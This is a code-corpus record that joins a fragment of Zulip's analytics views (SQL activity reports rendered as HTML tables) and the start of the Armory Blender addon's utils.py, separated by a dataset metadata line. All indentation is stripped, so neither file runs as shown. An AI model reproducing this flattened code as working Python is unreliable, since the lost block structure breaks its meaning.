key=lambda x: x[1])]
def table_filtered_to_id(table, key_id):
# type: (Type[BaseCount], int) -> QuerySet
if table == RealmCount:
return RealmCount.objects.filter(realm_id=key_id)
elif table == UserCount:
return UserCount.objects.filter(user_id=key_id)
elif table == StreamCount:
return StreamCount.objects.filter(stream_id=key_id)
elif table == InstallationCount:
return InstallationCount.objects.all()
else:
raise ValueError("Unknown table: %s" % (table,))
def client_label_map(name):
# type: (str) -> str
if name == "website":
return "Website"
if name.startswith("desktop app"):
return "Old desktop app"
if name == "ZulipAndroid":
return "Android app"
if name == "ZulipiOS":
return "Old iOS app"
if name == "ZulipMobile":
return "New iOS app"
if name in ["ZulipPython", "API: Python"]:
return "Python API"
if name.startswith("Zulip") and name.endswith("Webhook"):
return name[len("Zulip"):-len("Webhook")] + " webhook"
# Clients in dev environment autogenerated data start with _ so
# that it's easy to manually drop without affecting other data.
if settings.DEVELOPMENT and name.startswith("_"):
return name[1:]
return name
def rewrite_client_arrays(value_arrays):
# type: (Dict[str, List[int]]) -> Dict[str, List[int]]
mapped_arrays = {} # type: Dict[str, List[int]]
for label, array in value_arrays.items():
mapped_label = client_label_map(label)
if mapped_label in mapped_arrays:
for i in range(0, len(array)):
mapped_arrays[mapped_label][i] += value_arrays[label][i]
else:
mapped_arrays[mapped_label] = [value_arrays[label][i] for i in range(0, len(array))]
return mapped_arrays
def get_time_series_by_subgroup(stat, table, key_id, end_times, subgroups, labels, include_empty_subgroups):
# type: (CountStat, Type[BaseCount], Optional[int], List[datetime], List[str], List[str], bool) -> Dict[str, List[int]]
if len(subgroups) != len(labels):
raise ValueError("subgroups and labels have lengths %s and %s, which are different." %
(len(subgroups), len(labels)))
queryset = table_filtered_to_id(table, key_id).filter(property=stat.property) \
.values_list('subgroup', 'end_time', 'value')
value_dicts = defaultdict(lambda: defaultdict(int)) # type: Dict[Optional[str], Dict[datetime, int]]
for subgroup, end_time, value in queryset:
value_dicts[subgroup][end_time] = value
value_arrays = {}
for subgroup, label in zip(subgroups, labels):
if (subgroup in value_dicts) or include_empty_subgroups:
value_arrays[label] = [value_dicts[subgroup][end_time] for end_time in end_times]
if stat == COUNT_STATS['messages_sent:client:day']:
# HACK: We rewrite these arrays to collapse the Client objects
# with similar names into a single sum, and generally give
# them better names
return rewrite_client_arrays(value_arrays)
return value_arrays
eastern_tz = pytz.timezone('US/Eastern')
def make_table(title, cols, rows, has_row_class=False):
# type: (str, List[str], List[Any], bool) -> str
if not has_row_class:
def fix_row(row):
# type: (Any) -> Dict[str, Any]
return dict(cells=row, row_class=None)
rows = list(map(fix_row, rows))
data = dict(title=title, cols=cols, rows=rows)
content = loader.render_to_string(
'analytics/ad_hoc_query.html',
dict(data=data)
)
return content
def dictfetchall(cursor):
# type: (connection.cursor) -> List[Dict[str, Any]]
"Returns all rows from a cursor as a dict"
desc = cursor.description
return [
dict(list(zip([col[0] for col in desc], row)))
for row in cursor.fetchall()
]
def get_realm_day_counts():
# type: () -> Dict[str, Dict[str, str]]
query = '''
select
r.string_id,
(now()::date - pub_date::date) age,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
join zerver_client c on c.id = m.sending_client_id
where
(not up.is_bot)
and
pub_date > now()::date - interval '8 day'
and
c.name not in ('zephyr_mirror', 'ZulipMonitoring')
group by
r.string_id,
age
order by
r.string_id,
age
'''
cursor = connection.cursor()
cursor.execute(query)
rows = dictfetchall(cursor)
cursor.close()
counts = defaultdict(dict) # type: Dict[str, Dict[int, int]]
for row in rows:
counts[row['string_id']][row['age']] = row['cnt']
result = {}
for string_id in counts:
raw_cnts = [counts[string_id].get(age, 0) for age in range(8)]
min_cnt = min(raw_cnts)
max_cnt = max(raw_cnts)
def format_count(cnt):
# type: (int) -> str
if cnt == min_cnt:
good_bad = 'bad'
elif cnt == max_cnt:
good_bad = 'good'
else:
good_bad = 'neutral'
return '<td class="number %s">%s</td>' % (good_bad, cnt)
cnts = ''.join(map(format_count, raw_cnts))
result[string_id] = dict(cnts=cnts)
return result
def realm_summary_table(realm_minutes):
# type: (Dict[str, float]) -> str
query = '''
SELECT
realm.string_id,
coalesce(user_counts.active_user_count, 0) active_user_count,
coalesce(at_risk_counts.at_risk_count, 0) at_risk_count,
(
SELECT
count(*)
FROM zerver_userprofile up
WHERE up.realm_id = realm.id
AND is_active
AND not is_bot
) user_profile_count,
(
SELECT
count(*)
FROM zerver_userprofile up
WHERE up.realm_id = realm.id
AND is_active
AND is_bot
) bot_count
FROM zerver_realm realm
LEFT OUTER JOIN
(
SELECT
up.realm_id realm_id,
count(distinct(ua.user_profile_id)) active_user_count
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
WHERE
query in (
'/json/send_message',
'send_message_backend',
'/api/v1/send_message',
'/json/update_pointer',
'/json/users/me/pointer'
)
AND
last_visit > now() - interval '1 day'
AND
not is_bot
GROUP BY realm_id
) user_counts
ON user_counts.realm_id = realm.id
LEFT OUTER JOIN
(
SELECT
realm_id,
count(*) at_risk_count
FROM (
SELECT
realm.id as realm_id,
up.email
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
JOIN zerver_realm realm
ON realm.id = up.realm_id
WHERE up.is_active
AND (not up.is_bot)
AND
ua.query in (
'/json/send_message',
'send_message_backend',
'/api/v1/send_message',
'/json/update_pointer',
'/json/users/me/pointer'
)
GROUP by realm.id, up.email
HAVING max(last_visit) between
now() - interval '7 day' and
now() - interval '1 day'
) as at_risk_users
GROUP BY realm_id
) at_risk_counts
ON at_risk_counts.realm_id = realm.id
WHERE EXISTS (
SELECT *
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
WHERE
query in (
'/json/send_message',
'/api/v1/send_message',
'send_message_backend',
'/json/update_pointer',
'/json/users/me/pointer'
)
AND
up.realm_id = realm.id
AND
last_visit > now() - interval '2 week'
)
ORDER BY active_user_count DESC, string_id ASC
'''
cursor = connection.cursor()
cursor.execute(query)
rows = dictfetchall(cursor)
cursor.close()
# get messages sent per day
counts = get_realm_day_counts()
for row in rows:
try:
row['history'] = counts[row['string_id']]['cnts']
except Exception:
row['history'] = ''
# augment data with realm_minutes
total_hours = 0.0
for row in rows:
string_id = row['string_id']
minutes = realm_minutes.get(string_id, 0.0)
hours = minutes / 60.0
total_hours += hours
row['hours'] = str(int(hours))
try:
row['hours_per_user'] = '%.1f' % (hours / row['active_user_count'],)
except Exception:
pass
# formatting
for row in rows:
row['string_id'] = realm_activity_link(row['string_id'])
# Count active sites
def meets_goal(row):
# type: (Dict[str, int]) -> bool
return row['active_user_count'] >= 5
num_active_sites = len(list(filter(meets_goal, rows)))
# create totals
total_active_user_count = 0
total_user_profile_count = 0
total_bot_count = 0
total_at_risk_count = 0
for row in rows:
total_active_user_count += int(row['active_user_count'])
total_user_profile_count += int(row['user_profile_count'])
total_bot_count += int(row['bot_count'])
total_at_risk_count += int(row['at_risk_count'])
rows.append(dict(
string_id='Total',
active_user_count=total_active_user_count,
user_profile_count=total_user_profile_count,
bot_count=total_bot_count,
hours=int(total_hours),
at_risk_count=total_at_risk_count,
))
content = loader.render_to_string(
'analytics/realm_summary_table.html',
dict(rows=rows, num_active_sites=num_active_sites)
)
return content
def user_activity_intervals():
# type: () -> Tuple[mark_safe, Dict[str, float]]
day_end = timestamp_to_datetime(time.time())
day_start = day_end - timedelta(hours=24)
output = "Per-user online duration for the last 24 hours:\n"
total_duration = timedelta(0)
all_intervals = UserActivityInterval.objects.filter(
end__gte=day_start,
start__lte=day_end
).select_related(
'user_profile',
'user_profile__realm'
).only(
'start',
'end',
'user_profile__email',
'user_profile__realm__string_id'
).order_by(
'user_profile__realm__string_id',
'user_profile__email'
)
by_string_id = lambda row: row.user_profile.realm.string_id
by_email = lambda row: row.user_profile.email
realm_minutes = {}
for string_id, realm_intervals in itertools.groupby(all_intervals, by_string_id):
realm_duration = timedelta(0)
output += '<hr>%s\n' % (string_id,)
for email, intervals in itertools.groupby(realm_intervals, by_email):
duration = timedelta(0)
for interval in intervals:
start = max(day_start, interval.start)
end = min(day_end, interval.end)
duration += end - start
total_duration += duration
realm_duration += duration
output += " %-*s%s\n" % (37, email, duration)
realm_minutes[string_id] = realm_duration.total_seconds() / 60
output += "\nTotal Duration: %s\n" % (total_duration,)
output += "\nTotal Duration in minutes: %s\n" % (total_duration.total_seconds() / 60.,)
output += "Total Duration amortized to a month: %s" % (total_duration.total_seconds() * 30. / 60.,)
content = mark_safe('<pre>' + output + '</pre>')
return content, realm_minutes
def sent_messages_report(realm):
# type: (str) -> str
title = 'Recently sent messages for ' + realm
cols = [
'Date',
'Humans',
'Bots'
]
query = '''
select
series.day::date,
humans.cnt,
bots.cnt
from (
select generate_series(
(now()::date - interval '2 week'),
now()::date,
interval '1 day'
) as day
) as series
left join (
select
pub_date::date pub_date,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.string_id = %s
and
(not up.is_bot)
and
pub_date > now() - interval '2 week'
group by
pub_date::date
order by
pub_date::date
) humans on
series.day = humans.pub_date
left join (
select
pub_date::date pub_date,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.string_id = %s
and
up.is_bot
and
pub_date > now() - interval '2 week'
group by
pub_date::date
order by
pub_date::date
) bots on
series.day = bots.pub_date
'''
cursor = connection.cursor()
cursor.execute(query, [realm, realm])
rows = cursor.fetchall()
cursor.close()
return make_table(title, cols, rows)
def ad_hoc_queries():
# type: () -> List[Dict[str, str]]
def get_page(query, cols, title):
# type: (str, List[str], str) -> Dict[str, str]
cursor = connection.cursor()
cursor.execute(query)
rows = cursor.fetchall()
rows = list(map(list, rows))
cursor.close()
def fix_rows(i, fixup_func):
# type: (int, Union[Callable[[Realm], mark_safe], Callable[[datetime], str]]) -> None
for row in rows:
row[i] = fixup_func(row[i])
for i, col in enumerate(cols):
if col == 'Realm':
fix_rows(i, realm_activity_link)
elif col in ['Last time', 'Last visit']:
fix_rows(i, format_date_for_activity_reports)
content = make_table(title, cols, rows)
return dict(
content=content,
title=title
)
pages = []
###
for mobile_type in ['Android', 'ZulipiOS']:
title = '%s usage' % (mobile_type,)
query = '''
select
realm.string_id,
up.id user_id,
client.name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
client.name like '%s'
group by string_id, up.id, client.name
having max(last_visit) > now() - interval '2 week'
order by string_id, up.id, client.name
''' % (mobile_type,)
cols = [
'Realm',
'User id',
'Name',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Desktop users'
query = '''
select
realm.string_id,
client.name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
client.name like 'desktop%%'
group by string_id, client.name
having max(last_visit) > now() - interval '2 week'
order by string_id, client.name
'''
cols = [
'Realm',
'Client',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Integrations by realm'
query = '''
select
realm.string_id,
case
when query like '%%external%%' then split_part(query, '/', 5)
else client.name
end client_name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
(query in ('send_message_backend', '/api/v1/send_message')
and client.name not in ('Android', 'ZulipiOS')
and client.name not like 'test: Zulip%%'
)
or
query like '%%external%%'
group by string_id, client_name
having max(last_visit) > now() - interval '2 week'
order by string_id, client_name
'''
cols = [
'Realm',
'Client',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Integrations by client'
query = '''
select
case
when query like '%%external%%' then split_part(query, '/', 5)
else client.name
end client_name,
realm.string_id,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
(query in ('send_message_backend', '/api/v1/send_message')
and client.name not in ('Android', 'ZulipiOS')
and client.name not like 'test: Zulip%%'
)
or
query like '%%external%%'
group by client_name, string_id
having max(last_visit) > now() - interval '2 week'
order by client_name, string_id
'''
cols = [
'Client',
'Realm',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
return pages
@zulip_internal
@has_request_variables
def get_activity(request):
# type: (HttpRequest) -> HttpResponse
duration_content, realm_minutes = user_activity_intervals() # type: Tuple[mark_safe, Dict[str, float]]
counts_content = realm_summary_table(realm_minutes) # type: str
data = [
('Counts', counts_content),
('Durations', duration_content),
]
for page in ad_hoc_queries():
data.append((page['title'], page['content']))
title = 'Activity'
return render_to_response(
'analytics/activity.html',
dict(data=data, title=title, is_home=True),
request=request
)
def get_user_activity_records_for_realm(realm, is_bot):
# type: (str, bool) -> QuerySet
fields = [
'user_profile__full_name',
'user_profile__email',
'query',
'client__name',
'count',
'last_visit',
]
records = UserActivity.objects.filter(
user_profile__realm__string_id=realm,
user_profile__is_active=True,
user_profile__is_bot=is_bot
)
records = records.order_by("user_profile__email", "-last_visit")
records = records.select_related('user_profile', 'client').only(*fields)
return records
def get_user_activity_records_for_email(email):
# type: (str) -> List[QuerySet]
fields = [
'user_profile__full_name',
'query',
'client__name',
'count',
'last_visit'
]
records = UserActivity.objects.filter(
user_profile__email=email
)
records = records.order_by("-last_visit")
records = records.select_related('user_profile', 'client').only(*fields)
return records
def raw_user_activity_table(records):
# type: (List[QuerySet]) -> str
cols = [
'query',
'client',
'count',
'last_visit'
]
def row(record):
# type: (QuerySet) -> List[Any]
return [
record.query,
record.client.name,
record.count,
format_date_for_activity_reports(record.last_visit)
]
rows = list(map(row, records))
title = 'Raw Data'
return make_table(title, cols, rows)
def get_user_activity_summary(records):
# type: (List[QuerySet]) -> Dict[str, Dict[str, Any]]
#: `Any` used above should be `Union(int, datetime)`.
#: However current version of `Union` does not work inside other function.
#: We could use something like:
# `Union[Dict[str, Dict[str, int]], Dict[str, Dict[str, datetime]]]`
#: but that would require this long `Union` to carry on throughout inner functions.
summary = {} # type: Dict[str, Dict[str, Any]]
def update(action, record):
# type: (str, QuerySet) -> None
if action not in summary:
summary[action] = dict(
count=record.count,
last_visit=record.last_visit
)
else:
summary[action]['count'] += record.count
summary[action]['last_visit'] = max(
summary[action]['last_visit'],
record.last_visit
)
if records:
summary['name'] = records[0].user_profile.full_name
for record in records:
client = record.client.name
query = record.query
update('use', record)
if client == 'API':
m = re.match('/api/.*/external/(.*)', query)
if m:
client = m.group(1)
update(client, record)
if client.startswith('desktop'):
update('desktop', record)
if client == 'website':
update('website', record)
if ('send_message' in query) or re.search('/api/.*/external/.*', query):
update('send', record)
if query in ['/json/update_pointer', '/json/users/me/pointer', '/api/v1/update_pointer']:
update('pointer', record)
update(client, record)
return summary
def format_date_for_activity_reports(date):
# type: (Optional[datetime]) -> str
if date:
return date.astimezone(eastern_tz).strftime('%Y-%m-%d %H:%M')
else:
return ''
def user_activity_link(email):
# type: (str) -> mark_safe
url_name = 'analytics.views.get_user_activity'
url = urlresolvers.reverse(url_name, kwargs=dict(email=email))
email_link = '<a href="%s">%s</a>' % (url, email)
return mark_safe(email_link)
def realm_activity_link(realm_str):
# type: (str) -> mark_safe
url_name = 'analytics.views.get_realm_activity'
url = urlresolvers.reverse(url_name, kwargs=dict(realm_str=realm_str))
realm_link = '<a href="%s">%s</a>' % (url, realm_str)
return mark_safe(realm_link)
def realm_client_table(user_summaries):
# type: (Dict[str, Dict[str, Dict[str, Any]]]) -> str
exclude_keys = [
'internal',
'name',
'use',
'send',
'pointer',
'website',
'desktop',
]
rows = []
for email, user_summary in user_summaries.items():
email_link = user_activity_link(email)
name = user_summary['name']
for k, v in user_summary.items():
if k in exclude_keys:
continue
client = k
count = v['count']
last_visit = v['last_visit']
row = [
format_date_for_activity_reports(last_visit),
client,
name,
email_link,
count,
]
rows.append(row)
rows = sorted(rows, key=lambda r: r[0], reverse=True)
cols = [
'Last visit',
'Client',
'Name',
'Email',
'Count',
]
title = 'Clients'
return make_table(title, cols, rows)
def user_activity_summary_table(user_summary):
# type: (Dict[str, Dict[str, Any]]) -> str
rows = []
for k, v in user_summary.items():
if k == 'name':
continue
client = k
count = v['count']
last_visit = v['last_visit']
row = [
format_date_for_activity_reports(last_visit),
client,
count,
]
rows.append(row)
rows = sorted(rows, key=lambda r: r[0], reverse=True)
cols = [
'last_visit',
'client',
'count',
]
title = 'User Activity'
return make_table(title, cols, rows)
def realm_user_summary_table(all_records, admin_emails):
# type: (List[QuerySet], Set[Text]) -> Tuple[Dict[str, Dict[str, Any]], str]
user_records = {}
def by_email(record):
# type: (QuerySet) -> str
return record.user_profile.email
for email, records in itertools.groupby(all_records, by_email):
user_records[email] = get_user_activity_summary(list(records))
def get_last_visit(user_summary, k):
# type: (Dict[str, Dict[str, datetime]], str) -> Optional[datetime]
if k in user_summary:
return user_summary[k]['last_visit']
else:
return None
def get_count(user_summary, k):
# type: (Dict[str, Dict[str, str]], str) -> str
if k in user_summary:
return user_summary[k]['count']
else:
return ''
def is_recent(val):
# type: (Optional[datetime]) -> bool
age = datetime.now(val.tzinfo) - val
return age.total_seconds() < 5 * 60
rows = []
for email, user_summary in user_records.items():
email_link = user_activity_link(email)
sent_count = get_count(user_summary, 'send')
cells = [user_summary['name'], email_link, sent_count]
row_class = ''
for field in ['use', 'send', 'pointer', 'desktop', 'ZulipiOS', 'Android']:
visit = get_last_visit(user_summary, field)
if field == 'use':
if visit and is_recent(visit):
row_class += ' recently_active'
if email in admin_emails:
row_class += ' admin'
val = format_date_for_activity_reports(visit)
cells.append(val)
row = dict(cells=cells, row_class=row_class)
rows.append(row)
def by_used_time(row):
# type: (Dict[str, Any]) -> str
return row['cells'][3]
rows = sorted(rows, key=by_used_time, reverse=True)
cols = [
'Name',
'Email',
'Total sent',
'Heard from',
'Message sent',
'Pointer motion',
'Desktop',
'ZulipiOS',
'Android',
]
title = 'Summary'
content = make_table(title, cols, rows, has_row_class=True)
return user_records, content
@zulip_internal
def get_realm_activity(request, realm_str):
# type: (HttpRequest, str) -> HttpResponse
data = [] # type: List[Tuple[str, str]]
all_user_records = {} # type: Dict[str, Any]
try:
admins = Realm.objects.get(string_id=realm_str).get_admin_users()
except Realm.DoesNotExist:
return HttpResponseNotFound("Realm %s does not exist" % (realm_str,))
admin_emails = {admin.email for admin in admins}
for is_bot, page_title in [(False, 'Humans'), (True, 'Bots')]:
all_records = list(get_user_activity_records_for_realm(realm_str, is_bot))
user_records, content = realm_user_summary_table(all_records, admin_emails)
all_user_records.update(user_records)
data += [(page_title, content)]
page_title = 'Clients'
content = realm_client_table(all_user_records)
data += [(page_title, content)]
page_title = 'History'
content = sent_messages_report(realm_str)
data += [(page_title, content)]
realm_link = 'https://stats1.zulip.net:444/render/?from=-7days'
realm_link += '&target=stats.gauges.staging.users.active.%s.0_16hr' % (realm_str,)
title = realm_str
return render_to_response(
'analytics/activity.html',
dict(data=data, realm_link=realm_link, title=title),
request=request
)
@zulip_internal
def get_user_activity(request, email):
# type: (HttpRequest, str) -> HttpResponse
records = get_user_activity_records_for_email(email)
data = [] # type: List[Tuple[str, str]]
user_summary = get_user_activity_summary(records)
content = user_activity_summary_table(user_summary)
data += [('Summary', content)]
content = raw_user_activity_table(records)
data += [('Info', content)]
title = email
return render_to_response(
'analytics/activity.html',
dict(data=data, title=title),
request=request
)
| apache-2.0 | 1,357,763,504,589,575,200 | 32.502262 | 123 | 0.557969 | false | 3.885798 | false | false | false |
luboslenco/cyclesgame | blender/arm/utils.py | 1 | 24354 | import bpy
import json
import os
import glob
import platform
import zipfile
import re
import subprocess
import webbrowser
import numpy as np
import arm.lib.armpack
import arm.make_state as state
import arm.log as log
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def write_arm(filepath, output):
if filepath.endswith('.zip'):
with zipfile.ZipFile(filepath, 'w', zipfile.ZIP_DEFLATED) as zip_file:
if bpy.data.worlds['Arm'].arm_minimize:
zip_file.writestr('data.arm', arm.lib.armpack.packb(output))
else:
zip_file.writestr('data.json', json.dumps(output, sort_keys=True, indent=4, cls=NumpyEncoder))
else:
if bpy.data.worlds['Arm'].arm_minimize:
with open(filepath, 'wb') as f:
f.write(arm.lib.armpack.packb(output))
else:
filepath_json = filepath.split('.arm')[0] + '.json'
with open(filepath_json, 'w') as f:
f.write(json.dumps(output, sort_keys=True, indent=4, cls=NumpyEncoder))
def unpack_image(image, path, file_format='JPEG'):
print('Armory Info: Unpacking to ' + path)
image.filepath_raw = path
image.file_format = file_format
image.save()
def convert_image(image, path, file_format='JPEG'):
# Convert image to compatible format
print('Armory Info: Converting to ' + path)
ren = bpy.context.scene.render
orig_quality = ren.image_settings.quality
orig_file_format = ren.image_settings.file_format
orig_color_mode = ren.image_settings.color_mode
ren.image_settings.quality = 90
ren.image_settings.file_format = file_format
if file_format == 'PNG':
ren.image_settings.color_mode = 'RGBA'
image.save_render(path, scene=bpy.context.scene)
ren.image_settings.quality = orig_quality
ren.image_settings.file_format = orig_file_format
ren.image_settings.color_mode = orig_color_mode
def blend_name():
return bpy.path.basename(bpy.context.blend_data.filepath).rsplit('.')[0]
def build_dir():
return 'build_' + safestr(blend_name())
def get_fp():
wrd = bpy.data.worlds['Arm']
if wrd.arm_project_root != '':
return bpy.path.abspath(wrd.arm_project_root)
else:
s = bpy.data.filepath.split(os.path.sep)
s.pop()
return os.path.sep.join(s)
def get_fp_build():
return get_fp() + '/' + build_dir()
def get_os():
s = platform.system()
if s == 'Windows':
return 'win'
elif s == 'Darwin':
return 'mac'
else:
return 'linux'
def get_gapi():
wrd = bpy.data.worlds['Arm']
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
return getattr(item, target_to_gapi(item.arm_project_target))
if wrd.arm_runtime == 'Browser':
return 'webgl'
return arm.utils.get_player_gapi()
def get_rp():
wrd = bpy.data.worlds['Arm']
return wrd.arm_rplist[wrd.arm_rplist_index]
def bundled_sdk_path():
if get_os() == 'mac':
# SDK on MacOS is located in .app folder due to security
p = bpy.app.binary_path
if p.endswith('Contents/MacOS/blender'):
return p[:-len('Contents/MacOS/blender')] + '/armsdk/'
else:
return p[:-len('Contents/MacOS/./blender')] + '/armsdk/'
elif get_os() == 'linux':
# /blender
return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/'
else:
# /blender.exe
return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/'
# Passed by load_post handler when armsdk is found in project folder
use_local_sdk = False
def get_sdk_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons["armory"].preferences
p = bundled_sdk_path()
if use_local_sdk:
return get_fp() + '/armsdk/'
elif os.path.exists(p) and addon_prefs.sdk_bundled:
return p
else:
return addon_prefs.sdk_path
def get_ide_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons["armory"].preferences
return '' if not hasattr(addon_prefs, 'ide_path') else addon_prefs.ide_path
def get_ffmpeg_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return addon_prefs.ffmpeg_path
def get_renderdoc_path():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
p = addon_prefs.renderdoc_path
if p == '' and get_os() == 'win':
pdefault = 'C:\\Program Files\\RenderDoc\\qrenderdoc.exe'
if os.path.exists(pdefault):
p = pdefault
return p
def get_player_gapi():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'opengl' if not hasattr(addon_prefs, 'player_gapi_' + get_os()) else getattr(addon_prefs, 'player_gapi_' + get_os())
def get_code_editor():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'kodestudio' if not hasattr(addon_prefs, 'code_editor') else addon_prefs.code_editor
def get_ui_scale():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 1.0 if not hasattr(addon_prefs, 'ui_scale') else addon_prefs.ui_scale
def get_khamake_threads():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 1 if not hasattr(addon_prefs, 'khamake_threads') else addon_prefs.khamake_threads
def get_compilation_server():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'compilation_server') else addon_prefs.compilation_server
def get_save_on_build():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'save_on_build') else addon_prefs.save_on_build
def get_viewport_controls():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return 'qwerty' if not hasattr(addon_prefs, 'viewport_controls') else addon_prefs.viewport_controls
def get_legacy_shaders():
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'legacy_shaders') else addon_prefs.legacy_shaders
def get_relative_paths():
# Convert absolute paths to relative
preferences = bpy.context.preferences
addon_prefs = preferences.addons['armory'].preferences
return False if not hasattr(addon_prefs, 'relative_paths') else addon_prefs.relative_paths
def get_node_path():
if get_os() == 'win':
return get_sdk_path() + '/nodejs/node.exe'
elif get_os() == 'mac':
return get_sdk_path() + '/nodejs/node-osx'
else:
return get_sdk_path() + '/nodejs/node-linux64'
def get_kha_path():
if os.path.exists('Kha'):
return 'Kha'
return get_sdk_path() + '/Kha'
def get_haxe_path():
if get_os() == 'win':
return get_kha_path() + '/Tools/haxe/haxe.exe'
elif get_os() == 'mac':
return get_kha_path() + '/Tools/haxe/haxe-osx'
else:
return get_kha_path() + '/Tools/haxe/haxe-linux64'
def get_khamake_path():
return get_kha_path() + '/make'
def krom_paths(bin_ext=''):
sdk_path = get_sdk_path()
if arm.utils.get_os() == 'win':
krom_location = sdk_path + '/Krom'
krom_path = krom_location + '/Krom' + bin_ext + '.exe'
elif arm.utils.get_os() == 'mac':
krom_location = sdk_path + '/Krom/Krom.app/Contents/MacOS'
krom_path = krom_location + '/Krom' + bin_ext
else:
krom_location = sdk_path + '/Krom'
krom_path = krom_location + '/Krom' + bin_ext
return krom_location, krom_path
def fetch_bundled_script_names():
wrd = bpy.data.worlds['Arm']
wrd.arm_bundled_scripts_list.clear()
os.chdir(get_sdk_path() + '/armory/Sources/armory/trait')
for file in glob.glob('*.hx'):
wrd.arm_bundled_scripts_list.add().name = file.rsplit('.')[0]
script_props = {}
script_props_defaults = {}
def fetch_script_props(file):
with open(file) as f:
if '/' in file:
file = file.split('/')[-1]
if '\\' in file:
file = file.split('\\')[-1]
name = file.rsplit('.')[0]
script_props[name] = []
script_props_defaults[name] = []
lines = f.read().splitlines()
read_prop = False
for l in lines:
if not read_prop:
read_prop = l.lstrip().startswith('@prop')
if read_prop and 'var ' in l:
p = l.split('var ')[1]
valid_prop = False
# Has type
if ':' in p:
# Fetch default value
if '=' in p:
s = p.split('=')
ps = s[0].split(':')
prop = (ps[0].strip(), ps[1].split(';')[0].strip())
prop_value = s[1].split(';')[0].replace('\'', '').replace('"', '').strip()
valid_prop = True
else:
ps = p.split(':')
prop = (ps[0].strip(), ps[1].split(';')[0].strip())
prop_value = ''
valid_prop = True
# Fetch default value
elif '=' in p:
s = p.split('=')
prop = (s[0].strip(), None)
prop_value = s[1].split(';')[0].replace('\'', '').replace('"', '').strip()
valid_prop = True
# Register prop
if valid_prop:
script_props[name].append(prop)
script_props_defaults[name].append(prop_value)
read_prop = False
def fetch_script_names():
if bpy.data.filepath == "":
return
wrd = bpy.data.worlds['Arm']
# Sources
wrd.arm_scripts_list.clear()
sources_path = get_fp() + '/Sources/' + safestr(wrd.arm_project_package)
if os.path.isdir(sources_path):
os.chdir(sources_path)
# Glob supports recursive search since python 3.5 so it should cover both blender 2.79 and 2.8 integrated python
for file in glob.glob('**/*.hx', recursive=True):
name = file.rsplit('.')[0]
# Replace the path syntax for package syntax so that it can be searchable in blender traits "Class" dropdown
wrd.arm_scripts_list.add().name = name.replace(os.sep, '.')
fetch_script_props(file)
# Canvas
wrd.arm_canvas_list.clear()
canvas_path = get_fp() + '/Bundled/canvas'
if os.path.isdir(canvas_path):
os.chdir(canvas_path)
for file in glob.glob('*.json'):
wrd.arm_canvas_list.add().name = file.rsplit('.')[0]
os.chdir(get_fp())
def fetch_wasm_names():
if bpy.data.filepath == "":
return
wrd = bpy.data.worlds['Arm']
# WASM modules
wrd.arm_wasm_list.clear()
sources_path = get_fp() + '/Bundled'
if os.path.isdir(sources_path):
os.chdir(sources_path)
for file in glob.glob('*.wasm'):
name = file.rsplit('.')[0]
wrd.arm_wasm_list.add().name = name
os.chdir(get_fp())
def fetch_trait_props():
for o in bpy.data.objects:
fetch_prop(o)
for s in bpy.data.scenes:
fetch_prop(s)
def fetch_prop(o):
for item in o.arm_traitlist:
if item.name not in script_props:
continue
props = script_props[item.name]
defaults = script_props_defaults[item.name]
# Remove old props
for i in range(len(item.arm_traitpropslist) - 1, -1, -1):
ip = item.arm_traitpropslist[i]
# if ip.name not in props:
if ip.name.split('(')[0] not in [p[0] for p in props]:
item.arm_traitpropslist.remove(i)
# Add new props
for i in range(0, len(props)):
p = props[i]
found = False
for ip in item.arm_traitpropslist:
if ip.name.replace(')', '').split('(')[0] == p[0]:
found = ip
break
# Not in list
if not found:
prop = item.arm_traitpropslist.add()
prop.name = p[0] + ('(' + p[1] + ')' if p[1] else '')
